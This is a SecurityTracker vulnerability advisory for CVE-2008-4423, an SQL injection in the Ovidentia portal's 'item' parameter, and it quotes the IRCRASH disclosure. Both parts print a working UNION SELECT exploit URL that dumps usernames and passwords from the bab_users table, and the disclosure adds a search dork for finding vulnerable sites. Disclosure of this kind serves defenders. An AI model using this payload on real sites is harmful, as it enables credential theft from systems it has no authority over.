SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Ovidentia Vendors:   Cantico
Ovidentia Input Validation Flaw in 'item' Parameter Lets Remote Users Inject SQL Commands
SecurityTracker Alert ID:  1020650
SecurityTracker URL:  http://securitytracker.com/id/1020650
CVE Reference:   CVE-2008-4423   (Links to External Site)
Updated:  Oct 8 2008
Original Entry Date:  Aug 12 2008
Impact:   Disclosure of system information, Disclosure of user information, User access via network
Exploit Included:  Yes  

Description:   A vulnerability was reported in Ovidentia. A remote user can inject SQL commands.

The software does not properly validate user-supplied input in the 'item' parameter. A remote authenticated user can supply a specially crafted parameter value to execute SQL commands on the underlying database.

A demonstration exploit URL is provided:

http://[target]/index.php?tg=contact&idx=modify&item=-99999'+union+select+0,1,2,concat(0x6E69636B6E616D65,0x3A,nickname),concat(0x70617373776F7264,0x3A,password),5,6,7,8,9,10,11,12,13,14+from+bab_users/*

IRCRASH (R3d.W0rm (Sina Yazdanmehr)) reported this vulnerability.

Impact:   A remote user can execute SQL commands on the underlying database.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.ovidentia.org/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Ovidentia Sql Injection

################################################################################
####                          Ovidentia Sql Injection                            
################################################################################
#                                                                               
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                               
#Our Site : Http://IRCRASH.COM                                                     
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       
################################################################################
#                                                                                  
#Script Download : www.ovidentia.org                                                
#                                                                                   
#DORK : "Powered by Ovidentia"                                                      
#                                                                                   
################################################################################
#                                      [Bug]                                        
#                                                                                   
#http://Site/index.php?tg=contact&idx=modify&item=-99999'+union+select+0,1,2,concat(0x6E69636B6E616D65,0x3A,nickname),concat(0x70617373776F7264,0x3A,password),5,6,7,8,9,10,11,12,13,14+from+bab_users/*
#                                                                                   
#                                     [Note]                                        
#                                                                                   
#You must login by a simple user and then use bug ;)                                
#                                                                                   
#################################################################################
#                           Site : Http://IRCRASH.COM                            
###################################### TNX GOD ##################################

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC